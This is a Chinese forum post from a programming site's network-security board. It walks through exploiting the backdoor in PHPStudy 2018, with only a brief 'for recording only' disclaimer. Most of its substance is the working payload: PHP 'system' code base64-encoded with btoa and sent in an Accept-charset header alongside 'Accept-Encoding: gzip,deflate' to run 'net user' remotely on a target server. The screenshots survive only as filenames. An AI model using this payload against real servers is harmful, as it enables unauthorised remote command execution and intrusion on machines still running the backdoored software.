设为首页收藏本站 |天气与日历| 2025-07-02 星期三 19:17:00 乙巳(蛇)年 六月初八 戌时
     
 切换到窄版

私人站点

 找回密码
 立即注册
搜索
编程站点»编程站点 网络 网络安全 PHPstudy2018 后门简单使用
返回列表 发新帖
查看: 167|回复: 0

PHPstudy2018 后门简单使用

[复制链接]
admin

954

主题

954

帖子

3879

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
3879
发表于 2021-8-2 18:23:23 | 显示全部楼层 |阅读模式
首先声明,仅为记录使用。

测试用例php-5.4.45 + Apache
1467639-20190925131509175-29347095.png
index.php
1467639-20190925131830854-1887809723.png
使用Firefox 浏览器,可以编辑并且重发http请求

111.png

222.png

打印出“net user” base64 加密后的密文
btoa('echo system("net user");')

33333.png
本地 “net user”


44444.png
用上面打印出来的密文,提交
Accept-Encoding: gzip,deflate
Accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
(如箭头所指,有空格请去掉)

55555555.png
与本地内容一致...

66666666.png

漏洞所影响的版本如下

777777777.png






回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|编程站点 ( 冀ICP备2023028127号-2 )|友链申请|

GMT+8, 2025-7-2 19:17 , Processed in 0.093485 second(s), 27 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表